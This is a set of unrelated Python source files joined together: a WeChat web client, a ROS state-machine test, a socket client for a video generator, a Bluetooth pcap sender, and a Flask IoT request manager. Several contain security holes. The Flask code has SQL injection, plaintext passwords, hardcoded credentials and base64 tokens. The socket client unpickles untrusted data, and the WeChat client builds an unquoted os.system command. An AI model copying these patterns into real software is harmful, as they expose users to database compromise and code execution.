@catchKeyboardInterrupt
def start(self):
self._echo('[*] 微信网页版 ... 开动')
print
logging.debug('[*] 微信网页版 ... 开动')
while True:
self._run('[*] 正在获取 uuid ... ', self.getUUID)
self._echo('[*] 正在获取二维码 ... 成功')
print
logging.debug('[*] 微信网页版 ... 开动')
self.genQRCode()
print '[*] 请使用微信扫描二维码以登录 ... '
if not self.waitForLogin():
continue
print '[*] 请在手机上点击确认以登录 ... '
if not self.waitForLogin(0):
continue
break
self._run('[*] 正在登录 ... ', self.login)
self._run('[*] 微信初始化 ... ', self.webwxinit)
self._run('[*] 开启状态通知 ... ', self.webwxstatusnotify)
self._run('[*] 获取联系人 ... ', self.webwxgetcontact)
self._echo('[*] 应有 %s 个联系人,读取到联系人 %d 个' %
(self.MemberCount, len(self.MemberList)))
print
self._echo('[*] 共有 %d 个群 | %d 个直接联系人 | %d 个特殊账号 | %d 公众号或服务号' % (len(self.GroupList),
len(self.ContactList), len(self.SpecialUsersList), len(self.PublicUsersList)))
print
self._run('[*] 获取群 ... ', self.webwxbatchgetcontact)
logging.debug('[*] 微信网页版 ... 开动')
if self.DEBUG:
print self
logging.debug(self)
if self.interactive and raw_input('[*] 是否开启自动回复模式(y/n): ') == 'y':
self.autoReplyMode = True
print '[*] 自动回复模式 ... 开启'
logging.debug('[*] 自动回复模式 ... 开启')
else:
print '[*] 自动回复模式 ... 关闭'
logging.debug('[*] 自动回复模式 ... 关闭')
if sys.platform.startswith('win'):
import thread
thread.start_new_thread(self.listenMsgMode())
else:
listenProcess = multiprocessing.Process(target=self.listenMsgMode)
listenProcess.start()
while True:
text = raw_input('')
if text == 'quit':
listenProcess.terminate()
print('[*] 退出微信')
logging.debug('[*] 退出微信')
exit()
elif text[:2] == '->':
[name, word] = text[2:].split(':')
if name == 'all':
self.sendMsgToAll(word)
else:
self.sendMsg(name, word)
elif text[:3] == 'm->':
[name, file] = text[3:].split(':')
self.sendMsg(name, file, True)
elif text[:3] == 'f->':
print '发送文件'
logging.debug('发送文件')
elif text[:3] == 'i->':
print '发送图片'
[name, file_name] = text[3:].split(':')
self.sendImg(name, file_name)
logging.debug('发送图片')
elif text[:3] == 'e->':
print '发送表情'
[name, file_name] = text[3:].split(':')
self.sendEmotion(name, file_name)
logging.debug('发送表情')
def _safe_open(self, path):
if self.autoOpen:
if platform.system() == "Linux":
os.system("xdg-open %s &" % path)
else:
os.system('open %s &' % path)
def _run(self, str, func, *args):
self._echo(str)
if func(*args):
print '成功'
logging.debug('%s... 成功' % (str))
else:
print('失败\n[*] 退出程序')
logging.debug('%s... 失败' % (str))
logging.debug('[*] 退出程序')
exit()
def _echo(self, str):
sys.stdout.write(str)
sys.stdout.flush()
def _printQR(self, mat):
for i in mat:
BLACK = '\033[40m \033[0m'
WHITE = '\033[47m \033[0m'
print ''.join([BLACK if j else WHITE for j in i])
def _str2qr(self, str):
print(str)
qr = qrcode.QRCode()
qr.border = 1
qr.add_data(str)
qr.make()
# img = qr.make_image()
# img.save("qrcode.png")
#mat = qr.get_matrix()
#self._printQR(mat) # qr.print_tty() or qr.print_ascii()
qr.print_tty()
def _transcoding(self, data):
if not data:
return data
result = None
if type(data) == unicode:
result = data
elif type(data) == str:
result = data.decode('utf-8')
return result
def _get(self, url, api=None):
request = urllib2.Request(url=url)
request.add_header('Referer', 'https://wx.qq.com/')
if api == 'webwxgetvoice':
request.add_header('Range', 'bytes=0-')
if api == 'webwxgetvideo':
request.add_header('Range', 'bytes=0-')
try:
response = urllib2.urlopen(request)
data = response.read()
logging.debug(url)
return data
except urllib2.HTTPError, e:
logging.error('HTTPError = ' + str(e.code))
except urllib2.URLError, e:
logging.error('URLError = ' + str(e.reason))
except httplib.HTTPException, e:
logging.error('HTTPException')
except Exception:
import traceback
logging.error('generic exception: ' + traceback.format_exc())
return ''
def _post(self, url, params, jsonfmt=True):
if jsonfmt:
request = urllib2.Request(url=url, data=json.dumps(params))
request.add_header(
'ContentType', 'application/json; charset=UTF-8')
else:
request = urllib2.Request(url=url, data=urllib.urlencode(params))
try:
response = urllib2.urlopen(request)
data = response.read()
if jsonfmt:
return json.loads(data, object_hook=_decode_dict)
return data
except urllib2.HTTPError, e:
logging.error('HTTPError = ' + str(e.code))
except urllib2.URLError, e:
logging.error('URLError = ' + str(e.reason))
except httplib.HTTPException, e:
logging.error('HTTPException')
except Exception:
import traceback
logging.error('generic exception: ' + traceback.format_exc())
return ''
def _xiaodoubi(self, word):
url = 'http://www.xiaodoubi.com/bot/chat.php'
try:
r = requests.post(url, data={'chat': word})
return r.content
except:
return "让我一个人静静 T_T..."
def _simsimi(self, word):
key = ''
url = 'http://sandbox.api.simsimi.com/request.p?key=%s&lc=ch&ft=0.0&text=%s' % (
key, word)
r = requests.get(url)
ans = r.json()
if ans['result'] == '100':
return ans['response']
else:
return '你在说什么,风太大听不清列'
def _searchContent(self, key, content, fmat='attr'):
if fmat == 'attr':
pm = re.search(key + '\s?=\s?"([^"<]+)"', content)
if pm:
return pm.group(1)
elif fmat == 'xml':
pm = re.search('<{0}>([^<]+)</{0}>'.format(key), content)
if not pm:
pm = re.search(
'<{0}><\!\[CDATA\[(.*?)\]\]></{0}>'.format(key), content)
if pm:
return pm.group(1)
return '未知'
class UnicodeStreamFilter:
def __init__(self, target):
self.target = target
self.encoding = 'utf-8'
self.errors = 'replace'
self.encode_to = self.target.encoding
def write(self, s):
if type(s) == str:
s = s.decode('utf-8')
s = s.encode(self.encode_to, self.errors).decode(self.encode_to)
self.target.write(s)
def flush(self):
self.target.flush()
if sys.stdout.encoding == 'cp936':
sys.stdout = UnicodeStreamFilter(sys.stdout)
if __name__ == '__main__':
logger = logging.getLogger(__name__)
if not sys.platform.startswith('win'):
import coloredlogs
coloredlogs.install(level='DEBUG')
webwx = WebWeixin()
webwx.start()
|
ism_test.py
|
#!/usr/bin/env python
'''
Copyright (c) 2016, Allgeyer Tobias, Aumann Florian, Borella Jocelyn, Hutmacher Robin, Karrenbauer Oliver, Marek Felix, Meissner Pascal, Trautmann Jeremias, Wittenbeck Valerij
All rights reserved.
Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
import roslib
import rospy
import smach
import smach_ros
import threading
from pose_sampling import *
# To import files from parten directories
if __name__ == '__main__' and __package__ is None:
from os import sys, path
sys.path.append(path.dirname(path.dirname(path.abspath(__file__))))
from indirect_search.ism import SceneRecognition, PosePrediction
from common.object_detection import ObjectDetection
from common.init import clear_world_model
from geometry_msgs.msg import Pose, Point, Quaternion
class ISMInit(smach.State):
def __init__(self):
smach.State.__init__(
self,
outcomes=['succeeded'],
output_keys=['searched_object_types'])
def execute(self, userdata):
clear_world_model()
# objects used in the scenario
userdata.searched_object_types = ['PlateDeep', 'Smacks', 'CupPdV']
return 'succeeded'
def main():
rospy.init_node('object_detection_sm')
sm_object_detection = smach.StateMachine(outcomes=['succeeded',
'aborted',
'no_objects_found',
'found_all_required_scenes',
'found_all_objects',
'no_predictions_left'])
with sm_object_detection:
smach.StateMachine.add("INIT",
ISMInit(),
transitions={'succeeded': 'OBJECT_DETECTION'},
remapping={'searched_object_types':'searched_object_types'})
smach.StateMachine.add('OBJECT_DETECTION',
ObjectDetection(),
transitions={'no_objects_found':'no_objects_found',
'found_objects':'SCENE_RECOGNITION',
'aborted':'aborted'},
remapping={'searched_object_types':'searched_object_types',
'detected_objects':'detected_objects'})
smach.StateMachine.add('SCENE_RECOGNITION',
SceneRecognition(),
transitions={'found_scenes':'OBJECT_POSE_PREDICTION',
'found_all_required_scenes':'found_all_required_scenes',
'found_all_objects':'found_all_objects',
'aborted':'aborted'})
smach.StateMachine.add('OBJECT_POSE_PREDICTION',
PosePrediction(),
transitions={'succeeded':'succeeded',
'aborted':'aborted',
'no_predictions_left':'no_predictions_left'},
remapping={'object_pointcloud':'object_pointcloud'})
# smach.set_preempt_hanlder(sm_main)
smach_thread = threading.Thread(target = sm_object_detection.execute)
smach_thread.start()
rospy.spin()
rospy.signal_shutdown('All done.')
if __name__ == '__main__':
try:
main()
except rospy.ROSInterruptException: pass
|
generatorclient.py
|
import socket
from threading import Thread
import datetime
import pickle
import hashlib
import youtubequeue
musicTypes = None
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
last_upload_times = None
isRequestingScripts = False
# Connect the socket to the port where the server is listening
server_address = ('localhost', 11000)
def flagscript(scriptno, flagtype):
print("%s VID GEN CLIENT requesting to flag script" % datetime.datetime.now())
payload = ("flag-scripts", scriptno, flagtype)
sendToServer(sock, payload)
def updateUploadDetails(scriptno, timeuploaded, scedualedrelease):
payload = ("fin-script", scriptno, timeuploaded, scedualedrelease)
sendToServer(sock, payload)
def login(username, password):
payload = ("login-attempt-generator", username, hashlib.md5(password.encode()).hexdigest())
sendToServer(sock, payload)
def getLastUploadedScripts():
print("%s VID GEN CLIENT requesting last uploaded vids" % datetime.datetime.now())
payload = ("last-uploaded",)
sendToServer(sock, payload)
def sendToServer(server, payloadattachment):
payload_attach = pickle.dumps(payloadattachment)
HEADERSIZE = 10
payload = bytes(f"{len(payload_attach):<{HEADERSIZE}}", 'utf-8') + payload_attach
server.sendall(payload)
# change scriptIBuffer to scriptnos
def requestScripts(current_scripts):
global isRequestingScripts
isRequestingScripts = True
print("%s VID GEN CLIENT requesting scripts current (%s)" % (datetime.datetime.now(), current_scripts))
payload = ("video-generator-request-scripts", current_scripts)
sendToServer(sock, payload)
def connectToServer():
print('video generator connecting to %s port %s' % server_address)
try:
sock.connect(server_address)
except ConnectionRefusedError:
input("Could not connect to server. Press enter to continue")
exit()
thread = Thread(target=downloadListenThread)
thread.start()
def downloadListenThread():
global last_upload_times, isRequestingScripts, musicTypes
print("Client listen thread active")
HEADERSIZE = 10
while True:
full_msg = b''
new_msg = True
while True:
try:
buf = sock.recv(2048)
except OSError:
# happens when disconnecting
break
if new_msg:
msglen = int(buf[:HEADERSIZE])
print("%s VID GEN CLIENT new message (%s)" %( datetime.datetime.now(), msglen))
new_msg = False
full_msg += buf
#print("%s VID GEN CLIENT received %s%% (%s/%s)" % (datetime.datetime.now(), round(len(full_msg) / msglen * 100, 2), str(len(full_msg) / 1000000) + "MB", str(msglen / 1000000) + "MB"))
if len(full_msg) - HEADERSIZE == msglen:
print("%s VID GEN CLIENT received full message (%s)" % (datetime.datetime.now(), len(full_msg) - HEADERSIZE))
incomingdata = pickle.loads(full_msg[HEADERSIZE:])
new_msg = True
full_msg = b""
if incomingdata[0] == "login-success":
print("VID GEN LOGIN SUCCESS")
pass
elif incomingdata[0] == "script-send-to-generator":
scripts = incomingdata[1]
musicTypes = incomingdata[2]
print("%s VID GEN CLIENT received %s scripts" % (
datetime.datetime.now(), len(scripts)))
for script in scripts:
youtubequeue.scriptIBuffer.append(script)
youtubequeue.parseScripts()
isRequestingScripts = False
elif incomingdata[0] == "last-uploaded":
last_times = incomingdata[1]
last_upload_times = last_times
print("%s VID GEN CLIENT received last upload times" % (
datetime.datetime.now()))
|
bt.py
|
#!/usr/bin/python
import bluetooth, os, time, sys, threading
# The in directory for new pcap files
PCAP_DIR = "/tmp/pcaps"
GPSPATH = '/tmp/gpsfifo'
SERVICE_NAME = "EyeOfTechnology"
LOGFILE = "/var/log/iot.log"
is_running = True
def _curr_time():
return time.strftime("%Y-%m-%d %H:%M:%S")
def _format_log(logstring):
return _curr_time() + ": " + logstring + "\n"
"""
def bt_loop(ld):
'''
Connects to a device and then transmits pcaps.
'''
ld.write(_format_log("Staring service"))
sock=bluetooth.BluetoothSocket(bluetooth.RFCOMM)
ld.write(_format_log("Got bluetooth socket"))
# All the services with this name should be fine
service_desc = get_connection(ld)
# Getting service information
port = service_desc['port']
target_address = service_desc['host']
# Connecting to the device
sock.connect((target_address, port))
ld.write(_format_log("Connected to android device"))
while True:
# Loop through the in directory and send over files
time.sleep(2)
files = os.listdir(PCAP_DIR)
for f in files:
fd = open(PCAP_DIR + '/' + f, 'rb')
temp = fd.read()
sock.send(temp)
ld.write(_format_log("Sending " + f))
fd.close()
os.remove(PCAP_DIR + "/" + f)
"""
"""
def receive_loop(ld):
ld.write(_format_log("Staring service"))
sock=bluetooth.BluetoothSocket(bluetooth.RFCOMM)
ld.write(_format_log("Got bluetooth socket"))
# All the services with this name should be fine
service_desc = get_connection(ld)
# Getting service information
port = service_desc['port']
target_address = service_desc['host']
# Connecting to the device
sock.connect((target_address, port))
ld.write(_format_log("Connected to android device"))
while True:
time.sleep(2)
print "Getting data"
data = sock.recv(1024)
print "Data: " + data
"""
def send_data(ld, sock):
global is_running
while is_running:
try:
# Loop through the in directory and over files
time.sleep(2)
files = os.listdir(PCAP_DIR)
for f in files:
fn, fe = os.path.splitext(f)
if fe == ".pcap":
fd = open(PCAP_DIR + '/' + f, 'rb')
temp = fd.read()
sock.send(str(len(temp)).zfill(8))
sock.sendall(temp)
#ld.write(_format_log("Sending " + f))
fd.close()
os.remove(PCAP_DIR + "/" + f)
except Exception as e:
is_running = False
#ld.write(_format_log(str(e)))
#ld.write(_format_log("Send thread stopped"))
def receive_data(ld, sock):
global is_running
while is_running:
try:
time.sleep(7)
data = sock.recv(200)
with open (GPSPATH, 'w') as fd:
fd.write(data + ";\n")
except Exception as e:
is_running = False
#ld.write(_format_log(str(e)))
#ld.write(_format_log("Receive thread stopped"))
def connect_bluetooth(ld):
socket = get_bluetooth_socket(ld)
# any service with the name should be fine
service = get_bluetooth_services(ld, SERVICE_NAME)[0]
socket.connect((service['host'], service['port']))
#ld.write(_format_log("Connected to android device"))
return socket
def get_bluetooth_services(ld, name):
services = []
while len(services) < 1:
try:
# Search for the service
services = bluetooth.find_service(name=name)
except bluetooth.btcommon.BluetoothError as e:
error_msg = str(e)
#if not error_msg == "error accessing bluetooth device":
#ld.write(_format_log(str(e)))
return services
def get_bluetooth_socket(ld):
sock = bluetooth.BluetoothSocket(bluetooth.RFCOMM)
#ld.write(_format_log("Got bluetooth socket"))
return sock
def setup_logs(path):
if os.path.isfile(path):
return open(path, 'a', 0)
else:
return open(path, 'w', 0)
def start_threads(ld, sock):
sock.setblocking(True)
s = threading.Thread(target=send_data, args=(ld, sock))
r = threading.Thread(target=receive_data, args=(ld, sock))
s.start()
r.start()
return s, r
def handle_exception(ld, e, sock):
is_running = False
if sock is not None:
sock.close()
#ld.write(_format_log(str(e)))
#ld.write(_format_log("Out of send and receive threads"))
is_running = True
#ld.write(_format_log("Restarting service"))
if __name__=="__main__":
#ld = setup_logs(LOGFILE)
#ld.write(_format_log("Starting service"))
ld = None
while True:
socket = None
is_running = True
try:
socket = connect_bluetooth(ld)
s, r = start_threads(ld, socket)
s.join()
r.join()
except Exception as e:
handle_exception(ld, e, socket)
|
combined.py
|
from flask import Flask, request, render_template,jsonify
from flask_restful import Resource, Api
import mysql.connector
import json
import requests
import base64
import os
import zipfile
import re
import shutil
import requests
import time
import threading
from json import loads
from kafka import KafkaConsumer
'''
Sensor manager - 5050
Sensor Registration - 5051
Action Manager - 5052
Scheduler - 5053
Server LCM - 5054
Service LCM - 8080
Monitoring - 5055
Request Manager- 5056, 5057
Deployment - 5058
'''
app = Flask(__name__)
api = Api(app)
UPLOAD_FOLDER_APP = '/home/'
ALLOWED_EXTENSIONS_ZIP = {'zip'}
app.config['UPLOAD_FOLDER_APP'] = UPLOAD_FOLDER_APP
UPLOAD_FOLDER_SENSOR = '/home/'
ALLOWED_EXTENSIONS_JSON = {'json'}
app.config['UPLOAD_FOLDER_SENSOR'] = UPLOAD_FOLDER_SENSOR
kafkaDict = dict()
URL="0.0.0.0"
PORT=5056
PROTO="http://"
USER_TABLE_NAME = "user"
UPLOADS_TABLE_NAME = "useruploadss"
DB_NAME = "iot"
mydb = mysql.connector.connect(host="localhost",user="admindb",passwd="password")
cursor = mydb.cursor(buffered=True)
#This is the first process. It needs to create database and tables
query = "create database if not exists "+DB_NAME
cursor.execute(query)
query = "use "+DB_NAME
cursor.execute(query)
query = "create table if not exists "+USER_TABLE_NAME+"(username varchar(30), password varchar(30), token varchar(1000))"
cursor.execute(query)
query = "create table if not exists "+UPLOADS_TABLE_NAME+"(username varchar(30), appname varchar(30), serviceid varchar(30),servicename varchar(50), status varchar(20), scheduled varchar(20))"
cursor.execute(query)
#checks end here
mydb.commit()
cursor.close()
mydb.close()
class login(Resource):
def get(self):
return jsonify(token=-2)
def post(self):
authparams = request.get_json(force=True)
print("Login request from ",authparams["username"],"pass = ",authparams["password"])
global PROTO
URL_loc = PROTO + URL + ":" + str(PORT) + "/auth"
authparams["type"] = "generate"
authparams = json.dumps(authparams)
req = requests.post(url=URL_loc,data=authparams)
# the req has the token. The token is returned to the request
return json.loads(req.text)
class signup(Resource):
def get(self):
return jsonify(status="failure",message="no Parameters received. Expecting username and password")
def post(self):
mydb = mysql.connector.connect(host="localhost",user="admindb",passwd="password")
cursor = mydb.cursor(buffered=True)
query = "use "+DB_NAME
cursor.execute(query)
authparams = request.get_json(force=True)
username = authparams["username"]
password = authparams["password"]
print("Signup request from "+authparams["username"],"pass = ",authparams["password"])
query = "select * from "+USER_TABLE_NAME+" where username = \""+username+"\""
cursor.execute(query)
#print(cursor.rowcount," <- cursor row count")
if cursor.rowcount <= 0:
#not an existing user
query = "insert into "+USER_TABLE_NAME+" values(\""+username+"\",\""+password+"\",\"\")"
cursor.execute(query)
mydb.commit()
cursor.close()
mydb.close()
return jsonify(status="success")
elif cursor.rowcount == 1:
#there is a user with same username
print("User exists by name "+username)
mydb.commit()
cursor.close()
mydb.close()
#print("User exists")
return jsonify(status="failure",message="User exists. Try login.")
elif cursor.rowcount >1:
#ultiple uses. how did this happen
mydb.commit()
cursor.close()
mydb.close()
return jsonify(status="failure",message="Unknown Error")
return jsonify(status="failure",message="Unknown Error")
class authorize(Resource):
def get(self,num):
return jsonify(result="failure",message="Get is not a valid request. Please create POST request.")
def post(self):
mydb = mysql.connector.connect(host="localhost",user="admindb",passwd="password")
cursor = mydb.cursor(buffered=True)
query = "use "+DB_NAME
cursor.execute(query)
recvd_params = request.get_json(force=True)
if recvd_params["type"] == "generate":
username = recvd_params["username"]
password = recvd_params["password"]
message = username + ":" + password
query1 = "select * from "+USER_TABLE_NAME+" where username = \"" + username + "\""
cursor.execute(query1)
if cursor.rowcount <= 0:
#print("Got params "+username+","+password+" but did not find user in database")
mydb.commit()
cursor.close()
mydb.close()
return jsonify(status="failure",message="User not registered")
if cursor.rowcount > 1:
#print("Found multiple accounts with username "+username)
mydb.commit()
cursor.close()
mydb.close()
return jsonify(status="failure",message="Multiple Users")
message_bytes = message.encode('ascii')
base_64_bytes = base64.b64encode(message_bytes)
base_64 = base_64_bytes.decode('ascii')
cursor.close()
cursor = mydb.cursor(buffered=True)
query2 = "update user set token=\""+base_64+"\" where username=\""+username+"\";"
cursor.execute(query2)
#print(cursor.rowcount)
if cursor.rowcount == 1:
#print("Row updated for username "+username+" token set to "+base_64)
mydb.commit()
cursor.close()
mydb.close()
return jsonify(token=base_64,status="success")
if cursor.rowcount == 0:
#print("There were no updations. Token was already there ")
mydb.commit()
cursor.close()
mydb.close()
return jsonify(token=base_64,status="success")
#print("Error while updating token for user "+username)
elif recvd_params["type"] == "validate":
base64_message = recvd_params["token"]
base64_bytes = base64_message.encode('ascii')
message_bytes = base64.b64decode(base64_bytes)
message = message_bytes.decode('ascii')
if ":" not in message:
#failure
mydb.commit()
cursor.close()
mydb.close()
#print("Failed as : is not present in the string")
return jsonify(result="failure")
message = message.split(":")
username = message[0]
query = "select * from "+USER_TABLE_NAME+" where username = \""+username + "\""
#print("validating. Username is ",username)
cursor.execute(query)
if cursor.rowcount <= 0:
#failure
mydb.commit()
cursor.close()
mydb.close()
#print("Failed as username ",username," returned 0 rows")
return jsonify(result="failure")
if cursor.rowcount == 1:
#sucess
mydb.commit()
cursor.close()
mydb.close()
return jsonify(result="success",username=username)
#other issue
if cursor.rowcount >1:
#multiple users
mydb.commit()
cursor.close()
mydb.close()
print("Multiple users")
return jsonify(result="failure")
class request_manager_backend(Resource):
def get(self):
return jsonify(status="failure",message="GET request not valid. Please POST token")
def post(self):
mydb = mysql.connector.connect(host="localhost",user="admindb",passwd="password")
cursor = mydb.cursor(buffered=True)
query = "use "+DB_NAME
cursor.execute(query)
params = request.get_json(force=True)
username = params["username"]
# print("Req manager sending dashboard update for user "+username)
#print("################## REQ MANAGER SENDING AN UPDATE for "+username+" ####")
query = "select appname,serviceid,servicename,status,scheduled from "+UPLOADS_TABLE_NAME+" where username=\""+username+"\""
cursor.execute(query)
counter = 0
mainlist = list()
for x in cursor:
appname = x[0]
serviceid = x[1]
servicename = x[2]
status = x[3]
scheduled = x[4]
innerdict = dict()
innerdict["serviceid"]= serviceid
innerdict["servicename"]=servicename
innerdict["status"]=status
innerdict["scheduled"] = scheduled
maindict = dict()
found = False
for i in mainlist:
if i["appname"]==appname:
found = True
maindict = i
if found == True:
maindict["data"].append(innerdict)
else:
maindict["data"] = list()
maindict["data"].append(innerdict)
maindict["appname"] = appname
mainlist.append(maindict)
response = json.dumps(mainlist)
cursor.close()
mydb.commit()
mydb.close()
#print("################## REQ MANAGER SENDING AN UPDATE for "+username+" ENDS HERE ########")
return response
def allowed_file(filename):
return '.' in filename and \
filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS_ZIP
def kafkaThread(topic):
#print("############ STARTING KAFKA CONSUMER THREAD HERE for topic "+topic)
print("Launching kafka thread for topic :",topic)
consumer = KafkaConsumer(topic,group_id='request_manager1',
bootstrap_servers=['127.0.0.1:9092'],auto_offset_reset = "latest")
#print("request "+topic)
# consumer3 = KafkaConsumer(topic,
# bootstrap_servers=['localhost:9092'],
# auto_offset_reset='earliest',
# enable_auto_commit=True,
# group_id='request_manager1',
# value_deserializer=lambda x: loads(x.decode('utf-8')))
global kafkaDict
for message in consumer:
#temp = kafkaDict[topic]
msg = message.value.decode('utf-8')
#print("###### GOT A KAFKA MESSAGE ON "+topic)
#print("Buuffer is "+temp)
# print("Topic "+topic+" msg "+msg)
#temp = temp + "\n" + msg
kafkaDict[topic].append(msg)
def validate(path,username,appname):
global DB_NAME
mydb = mysql.connector.connect(host="localhost",user="admindb",passwd="password")
cursor = mydb.cursor(buffered=True)
query = "use "+DB_NAME
cursor.execute(query)
files = os.listdir(path)
directorynames = []
foldernames = list()
for name in files:
# print(name)
if name != "config.json":
directorynames.append(path+"/"+name)
foldernames.append(name)
jsondata = None
jsonpath = path+"/"+"config.json"
filef = open(jsonpath)
json_data_text = filef.read()
jsondata = json.loads(json_data_text)
for name in directorynames:
foldername = name.split("/")
foldername = foldername[-1]
# print(foldername)
files = os.listdir(name)
# print(files)
#for filenames in files:
# print(filenames)
kafka_topics = []
'''
for serviceid in foldernames:
a_topic = username+"_"+appname+"_"+jsondata["Application"]["services"][serviceid]["servicename"]
kafka_topics.append(a_topic)
isscheduled = jsondata["Application"]["services"][serviceid]["scheduled"]
if isscheduled == "True":
query = "insert into "+UPLOADS_TABLE_NAME+" values(\""+username+"\",\""+appname+"\",\""+serviceid+"\",\""+ jsondata["Application"]["services"][serviceid]["servicename"] +"\",\"Scheduled to Run\",\""+jsondata["Application"]["services"][serviceid]["scheduled"]+"\")"
else:
query = "insert into "+UPLOADS_TABLE_NAME+" values(\""+username+"\",\""+appname+"\",\""+serviceid+"\",\""+ jsondata["Application"]["services"][serviceid]["servicename"] +"\",\"Not Running\",\""+jsondata["Application"]["services"][serviceid]["scheduled"]+"\")"
print("Uploading, updating tables, query = "+query)
cursor.execute(query)
'''
print("Updating tables")
for obj in jsondata["Application"]["services"]:
serviceid = obj
servicename = jsondata["Application"]["services"][obj]["servicename"]
scheduled = jsondata["Application"]["services"][obj]["scheduled"]
a_topic = username+"_"+appname+"_"+servicename
kafka_topics.append(a_topic)
status = "Stopped"
if scheduled == "True":
status = "Processing"
query = "insert into "+UPLOADS_TABLE_NAME+" values(\""+username+"\",\""+appname+"\",\""+serviceid+"\",\""+servicename+"\",\""+status+"\",\""+scheduled+"\")"
cursor.execute(query)
global kafkaDict
for i in kafka_topics:
kafkaDict[i] = []
t1 = threading.Thread(target=kafkaThread,args=(i,))
t1.start()
cursor.close()
mydb.commit()
mydb.close()
#I need to send req to Jay here as None
response = dict()
response["servicename"] = ""
response["config"] = jsondata
response["action"] = "None"
#response = json.dumps(response)
# print("####################### UPLOAD TIME REQUEST TO JAY #####################")
# print(response)
# print("####################### UPLOAD TIME REQUEST TO JAY ENDS HERE ###########")
req = requests.post(url="http://13.68.206.239:5053/schedule_service",json=response)
print("Scheduler requested to schedule services which are scheduled")
return True
'''
@app.route('/uploadService', methods=['GET', 'POST'])
def upload_file():
if request.method == 'POST':
global DB_NAME
mydb = mysql.connector.connect(host="localhost",user="admindb",passwd="password")
cursor = mydb.cursor(buffered=True)
query = "use "+DB_NAME
cursor.execute(query)
username = request.form['username']
password = request.form['password']
print(username)
print(password)
message = username + ":" + password
message_bytes = message.encode('ascii')
base_64_bytes = base64.b64encode(message_bytes)
token = base_64_bytes.decode('ascii')
query = "select username from user where token=\""+token+"\""
print(token, " <- token")
cursor.execute(query)
if cursor.rowcount != 1:
cursor.close()
mydb.commit()
mydb.close()
return jsonify(status="failure",message="not logged in")
if 'file' not in request.files:
return jsonify(status="failure",message="Unknown error")
file = request.files['file']
if file.filename == '':
return jsonify(status="failure",message="No file selected")
if file and allowed_file(file.filename):
filename = str(file.filename)
dest = app.config['UPLOAD_FOLDER_APP']
file.save(os.path.join(app.config['UPLOAD_FOLDER_APP'], filename))
path = dest+filename
print(path)
filename = filename.split(".")
extractdest = dest+"/"+username+"/"+filename[0]
#before extracting . Delete if existing
users_folders = os.listdir(dest)
found = False
for users_names in users_folders:
if users_names == username:
found=True
if found == False:
os.mkdir(dest+"/"+username)
files = os.listdir(dest+"/"+username+"/")
print("filename[0] = ",filename[0])
for name in files:
#its a folder name. We need to compare
if name == filename[0]:
#we found a folder
print("Found match")
query = "delete from "+UPLOADS_TABLE_NAME+" where username=\""+username+"\" and appname=\""+name+"\""
cursor.execute(query)
shutil.rmtree(dest+username)
cursor.close()
mydb.commit()
mydb.close()
with zipfile.ZipFile(path, 'r') as zip_ref:
zip_ref.extractall(extractdest)
val_result = validate(extractdest,username,filename[0])
if val_result == False:
return jsonify(upload="success",validation="failure")
else:
return jsonify(upload="success",validation="success")
return
<!doctype html>
<title>Upload new File</title>
<h1>Upload the Service Here</h1>
<form method=post enctype=multipart/form-data>
<input type=file name=file>
<br><br>Enter Username :
<input type=text name=username>
<br><br>
Enter Password :
<input type=text name=password>
<br><br>
<input type=submit value=Upload>
</form>
'''
class processUpload(Resource):
def get(self):
return
def post(self):
recvd_params = request.get_json(force=True)
extractdest = recvd_params["extractdest"]
username = recvd_params["username"]
filename = recvd_params["filename"]
# print("Process upload got called")
print("Uploading")
validate(extractdest,username,filename)
return
class output(Resource):
def get(self,num):
return {"result":num*10}
def post(self):
recvd_params = request.get_json(force=True)
username = recvd_params["username"]
serviceid = recvd_params["serviceid"]
appname = recvd_params["appname"]
'''
we need to get data from kafka and send it in output
'''
#create topic username_applicationname_servicename
mydb = mysql.connector.connect(host="localhost",user="admindb",passwd="password")
cursor = mydb.cursor(buffered=True)
query = "use "+DB_NAME
cursor.execute(query)
query = "select servicename from "+UPLOADS_TABLE_NAME+" where username=\""+username+"\" AND serviceid=\""+serviceid+"\" AND appname=\""+appname+"\""
cursor.execute(query)
servicename = None
for x in cursor:
servicename = x[0]
cursor.close()
mydb.commit()
mydb.close()
print("Output requested for username : "+username+" appname : "+appname+" servicename : "+servicename)
topic = username+"_"+appname+"_"+servicename
global kafkaDict
msg = kafkaDict[topic]
# print("############ FROM OUTPUT, msg = ")
# for i in msg:
# print(i)
# print(" and topicname is "+topic)
#msg = json.dumps(msg)
return jsonify(status="success",output=msg)
class sendToScheduler(Resource):
def get(self):
return
def post(self):
recvd_params = request.get_json(force=True)
appname = recvd_params["appname"]
serviceid = recvd_params["serviceid"]
username = recvd_params["username"]
requesttype = recvd_params["request"]
dest = app.config['UPLOAD_FOLDER_APP']
json_path = dest+"/"+username+"/"+appname+"/"+"config.json"
file_json = open(json_path,"r")
config_data=json.load(file_json)
#Send request to Jay here:
response = dict()
response["servicename"] = serviceid
response["config"] = config_data
response["action"] = requesttype
#response = json.dumps(response)
# print("####################### FORCED REQUEST TO JAY #####################")
# print(response)
# print("####################### FORCED REQUEST TO JAY ENDS HERE ###########")
